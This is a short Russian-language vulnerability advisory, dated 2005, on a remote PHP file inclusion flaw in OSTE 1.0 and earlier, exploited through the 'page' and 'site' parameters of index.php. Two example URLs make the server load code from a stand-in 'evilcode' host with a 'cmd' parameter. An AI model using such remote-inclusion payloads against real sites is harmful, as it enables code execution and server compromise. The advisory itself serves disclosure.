PHP-инклюдинг в OSTE

Дата публикации:
09.11.2005
Всего просмотров:
2489
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
OSTE 1.x
Уязвимые версии: OSTE 1.0 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой систме.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "page" и "site" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://www.site.com/index.php?page=http://evilcode?&cmd=

www.site.com/?site=evilcode?&cmd=

URL производителя: oste.nerdie.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: OSTE File Inclusion Vulnerability

или введите имя

CAPTCHA